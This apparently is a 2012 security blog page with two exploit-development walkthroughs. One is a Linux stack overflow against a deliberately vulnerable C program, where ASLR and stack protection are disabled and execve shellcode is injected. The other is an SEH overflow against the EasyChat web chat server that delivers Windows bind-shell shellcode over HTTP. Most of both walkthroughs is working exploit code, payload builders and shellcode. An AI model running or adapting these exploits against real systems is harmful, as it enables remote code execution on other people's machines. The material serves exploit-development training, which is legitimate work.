Friday, 24 February 2012

EXPLOITATION ON BACKTRACK R2 (Stack overflow)

1. Turn off ASLR on Linux

root@justview:~# cat /proc/sys/kernel/randomize_va_space
root@justview:~# echo 0 > /proc/sys/kernel/randomize_va_space
root@justview:~# cat /proc/sys/kernel/randomize_va_space

The first cat shows the current setting (2, full randomization, is the default on a stock kernel); after writing 0 the second cat should print 0. The setting is not persistent across reboots and disables stack and library address randomization for every process on the machine, so only do this on a lab box. It is needed here because the exploit hard-codes a stack address.

2. Create the vulnerable application

Open your editor and write this vulnerable program:


##############################
// I am a vulnerable thing.
#include <stdio.h>
#include <string.h>

int main(int argc, char** argv)
{
    char buffer[500];
    if (argc < 2)
        return 1;
    strcpy(buffer, argv[1]); // Vulnerable function! No length check: an argument longer than
                             // 500 bytes runs past buffer into the saved EBP and return address.
    return 0;
}
##############################

Save it as vulnerable.c.


3. Compile the application

Result of the compilation (shown in the screenshot of the original post):

4. Run the application

Load the binary in gdb and run it with an argument of 600 bytes of 0x41 ('A') to overwrite the stack:

(gdb) run $(python -c 'print "\x41" * 600')


After running this we do not see EIP overwritten with 0x41414141: the program is aborted by the stack-smashing protector instead (glibc prints "*** stack smashing detected ***"). gcc on Ubuntu-based systems such as BackTrack enables SSP (-fstack-protector) by default, which places a canary between the buffer and the saved return address and checks it before main returns. This is a distribution default rather than an upstream gcc default, but to see the plain overwrite we must turn SSP off.

5. Turn off SSP

Open a new tab and recompile with the protector disabled:

root@justview:~# gcc -ggdb -o vulnerable -fno-stack-protector -mpreferred-stack-boundary=2 vulnerable.c

-fno-stack-protector drops the canary, -mpreferred-stack-boundary=2 aligns the stack to 4 bytes so the saved EBP and the return address directly follow the 500-byte buffer (no alignment padding), and -ggdb keeps debug symbols for gdb.


6. Run the application again

root@justview:~# gdb vulnerable

Send the same input again:

(gdb) run $(python -c 'print "\x41"*600')




Now EIP reads 0x41414141: the return address has been overwritten with our 'A' bytes. Next we generate a unique 600-byte string with pattern_create.rb to find exactly where EIP sits inside the input.

7. Create a pattern

root@justview:/pentest/exploits/framework/tools# ./pattern_create.rb 600 > string_pattern.txt

Open the file with kwrite and paste the pattern into the run command in place of the 'A' bytes.

8. Run with the 600-byte pattern to find the offset of EIP

EIP now holds a fragment of the pattern (0x41387141, i.e. the bytes "Aq8A" read as a little-endian dword), which tells us how far into the input the return address lies.

9. Use pattern_offset to get the offset

Running pattern_offset.rb with 0x41387141 reports offset 504: bytes 504 to 507 of the input overwrite EIP. That is the 500-byte buffer followed by the 4-byte saved EBP; 504 + 4 = 508 bytes takes us up to and including the return address.

10. Adjust the fuzzer

(gdb) run $(python -c 'print "\x41"*508')

With exactly 508 bytes EIP is 0x41414141 and nothing past the return address is disturbed. EIP is under our control, and ESP, read from the register dump at the crash, tells us where our data sits on the stack.

11. Find the address of ESP

The payload layout for this case: 323 bytes of junk (NOPs) + a 45-byte shellcode = 368 bytes.
508 bytes - 368 bytes = 140 bytes.
So after the shellcode we still have 140 bytes; dividing 140 by 4 (the size of one memory address, \x41\x41\x41\x41 for example) gives 35 copies of the return address.

At the crash the register dump gives ESP = 0xbffff16c.

Now open KCalc (in hex mode) and subtract 200 from it:
0xbffff16c - 0x200 = 0xbfffef6c

Note that the subtraction is hexadecimal: 0x200 is 512 bytes, so the return address points 512 bytes below the crash-time ESP, where the NOP sled is meant to be. Written little-endian the address is \x6c\xef\xff\xbf, the value repeated 35 times at the end of the payload. It contains no null byte, which matters because strcpy stops at the first 0x00.

Two caveats: the argument string itself lives on the stack above main's frame, so changing the payload length moves the frame and with it the ESP value; and gdb adds its own environment variables, so an address measured inside gdb differs from one measured outside it. This is why the NOP count has to be tuned below.
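The offset and payload arithmetic of steps 7 to 11, as an added example that is not part of the original post: a Python 3 reimplementation of the Metasploit pattern_create/pattern_offset logic plus a builder for the [NOP sled][shellcode][return address x N] layout. It assumes the values from the post (600-byte pattern, EIP 0x41387141, ESP 0xbffff16c, the 45-byte shellcode quoted from step 12) and only produces the argument bytes; it does not run or attach to the target.

```python
import struct
import sys

# Metasploit-style cyclic pattern: Aa0Aa1...Aa9Ab0... (upper, lower, digit triplets)
def pattern_create(length):
    out = bytearray()
    for upper in b"ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        for lower in b"abcdefghijklmnopqrstuvwxyz":
            for digit in b"0123456789":
                if len(out) >= length:
                    return bytes(out[:length])
                out += bytes([upper, lower, digit])
    return bytes(out[:length])

def pattern_offset(eip_value, length=600):
    """Offset of the 4 pattern bytes that ended up in EIP (EIP is a little-endian dword)."""
    needle = struct.pack("<I", eip_value)
    idx = pattern_create(length).find(needle)
    if idx < 0:
        raise ValueError("value not found in pattern")
    return idx

# 45-byte Linux x86 execve("/bin/bash") shellcode, quoted from step 12 of the post
SHELLCODE = (b"\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f"
             b"\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1"
             b"\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80")

def build_payload(ret_offset, esp, shellcode=SHELLCODE, nop_count=323, esp_delta=0x200):
    """Build [NOPs][shellcode][ret addr x N], exactly ret_offset + 4 bytes long.

    The return address is ESP minus esp_delta (0x200 = 512, the post's KCalc step),
    packed little-endian and repeated to fill the space left after the shellcode."""
    total = ret_offset + 4
    ret_addr = esp - esp_delta
    addr = struct.pack("<I", ret_addr)
    remaining = total - nop_count - len(shellcode)
    if remaining < 4 or remaining % 4 != 0:
        raise ValueError("nop_count/shellcode do not leave a whole number of addresses")
    copies = remaining // 4
    payload = b"\x90" * nop_count + shellcode + addr * copies
    if b"\x00" in payload:
        raise ValueError("payload contains a null byte; strcpy would truncate it")
    return payload, ret_addr, copies

if __name__ == "__main__":
    off = pattern_offset(0x41387141)                       # 504 for the post's EIP value
    payload, ret_addr, copies = build_payload(off, 0xbffff16c)
    if "--raw" in sys.argv:
        # raw bytes for: gdb --args ./vulnerable "$(python3 payload.py --raw)"
        sys.stdout.buffer.write(payload)
    else:
        print("EIP offset %d, return address %#x x%d, payload %d bytes"
              % (off, ret_addr, copies, len(payload)))
```

Changing nop_count shifts the shellcode inside the fixed 508-byte frame while the builder recomputes how many address copies fit, which is the knob the post turns (323, 370, 301) when the hard-coded address misses the sled.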


12. Generate the shellcode

The shellcode generator used is linked in the original post (download link not reproduced here). The 45-byte payload used below is a Linux x86 execve("/bin/bash") shellcode followed by exit().



Once we have the shellcode, change the fuzzer to:


run $(python -c 'print "\x90" * 323 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x6c\xef\xff\xbf" * 35')
Starting program: /root/vulner $(python -c 'print "\x90" * 323 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x6c\xef\xff\xbf" * 35')

The result after running it is shown in the screenshot.

If you see this condition, quit gdb and run the fuzzer again.

Then try changing the NOP count in the fuzzer to 370 and look at the result.

After changing the value again to 301, I finally succeeded.


GOOD LUCK
Try Harder..


Wednesday, 22 February 2012

EXPLOIT EasyChat (SEH)

I.    INFORMATION GATHERING
While waiting for the Wireshark capture, open the application.





Result of Wireshark (screenshot in the original post):







II. Service Enumeration

Port 80

SSL Port 443

III. Vulnerability Identification

GET /chatsubmit.ghp?username=heril&password=heril&room=1 HTTP/1.1

From this request (captured with Wireshark) we know we can deliver the fuzzer to port 80 as a GET request, placing the oversized data in the username parameter; the fuzzer below targets /chat.ghp with the same parameters.



IV. Exploitation

1.    Making the fuzzer

#!/usr/bin/python
# Python 2 fuzzer: sends a 30000-byte username in a GET request
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tes="\x90" * 30000                       # 30000 NOP bytes as the username
s.connect(('192.168.56.101',80))         # target host and HTTP port
s.send("GET /chat.ghp?username="+tes+"&password=heri&room=1 HTTP/1.1"+"\r\n\r\n")
print("============== >>")
s.close()

Run the fuzzer; when the application crashes, open View > SEH chain in the debugger to confirm the SEH record has been overwritten.


Generate a 30000-byte pattern with pattern_create.rb.


2.    Edit the fuzzer

#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tes="your pattern_create"                # paste the 30000-byte pattern here
s.connect(('192.168.56.101',80))
s.send("GET /chat.ghp?username="+tes+"&password=heri&room=1 HTTP/1.1"+"\r\n\r\n")
print("============== >>")
s.close()

Run the fuzzer; when the application crashes, open View > SEH chain and note the pattern bytes that landed in the SEH record. Feeding them to pattern_offset.rb gives the offset of the next-SEH pointer (216 here, as used in the fuzzer below).


3. Search for a module

Open View > Executable modules and choose SSLEAY32. Double-click it and follow the steps in the screenshots to locate a POP POP RETN sequence in the module; the address found (0x1001B2B6) is used as the SEH handler below.




4. Edit your fuzzer

#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tes="\x90" * 216                         # padding up to the next-SEH pointer (offset 216)
tes+="\xEE\xEE\xEE\xEE"                  # marker in nSEH: easy to recognise when execution lands here
tes+="\xB6\xB2\x01\x10"                  # SEH handler = 0x1001B2B6 (POP POP RETN in ssleay32.dll), little-endian
tes+="\x90" * (30004-len(tes))           # pad to the full 30004 bytes
s.connect(('192.168.56.101',80))
s.send("GET /chat.ghp?username="+tes+"&password=heri&room=1 HTTP/1.1"+"\r\n\r\n")
print("============== >>")
s.close()

Run the fuzzer again. When the application crashes, open View > SEH chain, select the handler address and press F2 to set a breakpoint on it, then press Shift+F9 to pass the exception to the program so the handler is invoked.
Press F7 three times to step through POP, POP and RETN.


Watch where execution lands after the POP POP RETN: it should arrive at the nSEH slot holding our \xEE marker, which is where the short jump to the shellcode will go.

Now edit the fuzzer for the final payload.

5. Check the module for bad values

Bad values in a module: 4, 5, 6, 7, C, 3 and F. We search for bad values in the application's SSLEAY32 module.

Copy ssleay32.dll into /pentest/exploits/framework, then:

root@justview:/pentest/exploits/framework# ./msfpescan -i ssleay32.dll

We found no bad value, so we use this module.

6. Create the shellcode and edit your fuzzer

Open your browser and choose Windows Bind shell in the shellcode generator linked in the original post.






#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tes="\x90" * 216                         # padding up to the next-SEH pointer (offset 216)
tes+="\xEB\x06\x90\x90"                  # nSEH: jmp short +6 over the handler, landing on the NOPs below
tes+="\xB6\xB2\x01\x10"                  # SEH handler = 0x1001B2B6 (POP POP RETN in ssleay32.dll)
tes+="\x90" * 16                         # small NOP pad before the shellcode
tes+=("\x33\xc9\xb1\x51\xda\xcb\xb8\xa7\x84\x38\x6a\xd9\x74\x24\xf4\x5b"
"\x31\x43\x13\x03\x43\x13\x83\x4c\x78\xda\x9f\x6e\xeb\xf0\x2d\x66"
"\x15\xf9\x51\x89\x86\x8d\xc2\x51\x63\x19\x5f\xa5\xe0\x61\x65\xad"
"\xf7\x76\xee\x02\xe0\x03\xae\xbc\x11\xff\x18\x37\x25\x74\x9b\xa9"
"\x77\x4a\x05\x99\xfc\x8a\x42\xe6\x3d\xc0\xa6\xe9\x7f\x3e\x4c\xd2"
"\x2b\xe5\x85\x51\x31\x6e\x8a\xbd\xb8\x9a\x53\x36\xb6\x17\x17\x17"
"\xdb\xa6\xcc\xa4\xcf\x23\x9b\xc6\x2b\x28\xfd\xd5\x05\x8b\x99\x52"
"\x26\x1b\xe9\x24\xa5\xd0\x9d\xb8\x18\x6d\x1d\xc8\x3c\x1a\x10\x86"
"\xce\x36\x7c\xe9\x19\xa0\x2e\x73\xce\x1e\xe3\x13\x79\x12\x31\xbc"
"\xd1\x2b\xe5\x2a\x11\x3e\xfa\x91\xf5\x3e\xd5\xba\x7c\x25\xbc\xc5"
"\x92\xae\x43\x90\x06\xad\xbc\xca\xbf\x68\x4b\x1f\x92\xdc\xb3\x09"
"\xbe\xb1\x18\xe6\x12\x75\xcc\x4b\xc6\x86\x22\x2d\x80\x69\x9f\xd7"
"\x03\x03\xfe\x82\xcc\xb7\x1b\xdc\xcb\xef\xe4\xca\xbe\x1f\x4a\xa7"
"\xc1\xf0\x04\xe3\x93\xdf\x3d\xbc\x14\xc9\xed\x17\x14\x26\x79\x72"
"\xa3\x41\x33\x2b\xcb\x98\x94\x87\x67\x70\xea\xf7\x1b\x12\xf3\x8e"
"\xdd\x9a\xac\x8f\x34\x09\xac\xbf\xdf\xd8\x36\x59\x48\x7e\xda\x2c"
"\x6d\xea\x74\x77\x47\x27\xfd\x60\xfd\xf3\x77\x8c\x33\x3c\x74\xfa"
"\xca\xfe\x56\x04\x70\xd3\x3b\x75\x0f\x13\x97\x2e\x5b\x0b\x95\xce"
"\x2f\xda\xa6\x5b\x14\x1c\x8e\xf8\xc3\xb0\x7e\xaf\xba\x5e\x80\x1e"
"\x6c\xca\xd3\x5f\x5e\x9c\x7e\x46\x5a\x93\xd2\x87\xb3\x41\x2a\x88"
"\x0b\x69\x04\xfd\x23\x69\x26\xc5\xa8\x6e\xff\x97\xcf\x41\x68\x69"
"\xe8\x80\x1a\xc6\xf7\x93\x22\x38")
tes+="\x90" * (30004-len(tes))
s.connect(('192.168.56.101',80))
s.send("GET /chat.ghp?username="+tes+"&password=heri&room=1 HTTP/1.1"+"\r\n\r\n")
print("============== >>")
s.close()






Run the fuzzer again; after the crash is handled, execution goes through POP POP RETN, the short jump and the NOP pad into the bind-shell shellcode.


GOOD LUCK